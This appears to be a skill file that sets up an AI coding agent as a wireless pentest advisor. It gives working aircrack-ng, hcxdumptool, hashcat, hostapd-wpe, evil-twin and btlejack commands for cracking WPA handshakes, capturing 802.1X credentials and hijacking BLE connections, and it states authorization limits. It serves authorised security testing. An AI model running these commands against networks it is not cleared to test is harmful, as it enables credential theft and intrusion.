pentest-wireless

name: pentest-wireless description: Wireless network pentest — WPA/WPA2/WPA3, evil twin, 802.1X enterprise, Bluetooth advisory. Triggers on wireless pentest, WiFi, WPA2, WPA3, PMKID, evil twin, deauth, Aircrack, hcxdumptool, 802.1X, Bluetooth, BLE security. license: MIT compatibility: Works with Claude Code allowed-tools: Read Write Edit Bash Grep metadata: author: badi homepage: https://github.com/fatihkan/badi-skills/tree/main/skills/pentest-wireless badi-version: ">=1.24.0" category: pentest scope: advisory inspired-by: 0xSteph/pentest-ai-agents wireless-pentester

WiFi + Bluetooth pentest advisory. Active wifi attacks require physical presence within the engagement + spectrum authorization.

Triggers

"WiFi pentest"
"WPA2 handshake crack"
"WPA3 SAE"
"evil twin"
"deauth attack"
"802.1X PEAP"
"Bluetooth pentest"
"BLE GATT"

Methodology

1. Recon: passive listen with airodump-ng / kismet
2. Target detection: SSID, BSSID, channel, encryption, client count
3. Capture handshake: deauth + capture (WPA2) / PMKID (no client needed)
4. Crack: hashcat / aircrack-ng
5. Post-conn: ARP spoofing + MITM (if available)
6. Enterprise: EAP-PEAP relay (hostapd-wpe)

Target Detection

# QUIET — passive monitor
airodump-ng wlan0mon                          # list all APs
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# QUIET — channel hop monitor
kismet -c wlan0

Handshake Capture Approaches

Method	Description	OPSEC
4-way + deauth	Requires an active client + deauth attack	LOUD
PMKID	No client needed (modern AP vulnerability)	QUIET
WPS PIN	Brute force on a WPS-enabled AP (Reaver, Bully)	LOUD
Evil twin	Own AP, phish the user	LOUD (legal risk)

# PMKID capture (quietest, no client needed)
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
hcxpcapngtool -o hash.hc22000 pmkid.pcapng

# Hashcat crack
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/best64.rule

# 4-way handshake (classic)
aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF capture-01.cap

WPA3 SAE

Dragonblood attacks (CVE-2019-9494, CVE-2019-9495): downgrade + side-channel
Transition mode (WPA2 + WPA3) — downgrade via WPA2 fallback
SAE-PT: pre-shared password table offline (group-specific)

802.1X Enterprise

# EAP relay (hostapd-wpe) — capture user credentials
hostapd-wpe ./hostapd-wpe.conf

# Cred captured -> NTLM hash crack (offline)
hashcat -m 5500 hash.txt wordlist.txt

Mitigation: device certificate validation (Server Certificate Validation + CA pin) — should be mandatory during user onboarding.

Evil Twin (Legal Framework Matters)

Only within an authorized pentest
A hotspot that imitates the AP's SSID
The user enters creds -> capture
Risk: accidentally phishing an authorized user + GDPR violation

# WiFi-Pumpkin / Pi-Hole AP framework
# Pumpkin -i wlan0 --ssid "Corp-Guest"

Bluetooth / BLE

# QUIET — passive scan
hcitool lescan
sudo bluetoothctl
# > scan on

# BLE GATT enumeration
gatttool -b AA:BB:CC:DD:EE:FF -I
# > connect
# > primary
# > characteristics

# BLE replay/MITM (gatttool + spoof)
# btlejack: BLE sniffer + relay
btlejack -s                                   # sniff advertisements
btlejack -c any -j                            # hijack connection (CTF/lab)

Output Template

## Wireless Pentest — <location>

### AP Inventory
- "CorpWiFi" (WPA2-PSK) — handshake captured, crack 3h (weak password)
- "CorpEnterprise" (WPA2-EAP) — captured 12 user creds via PEAP relay
- "CorpGuest" (Open) — captive portal bypass attempt (out-of-scope)

### Findings
- WPA2-PSK password "Spring2024" (3h crack)
- Missing cert validation on client devices -> 802.1X PEAP relay success

### Recommendation
- PSK -> Enterprise EAP-TLS (certificate)
- Cert pinning required on the client side
- WPA3-only mode (turn off transition mode)

Out-of-Scope

Unauthorized spectrum / unlicensed radio operation (CFAA + legal risk)
DoS via deauth against the other side (legal risk + scope-guard hard refusal)
Evil twin at a third-party location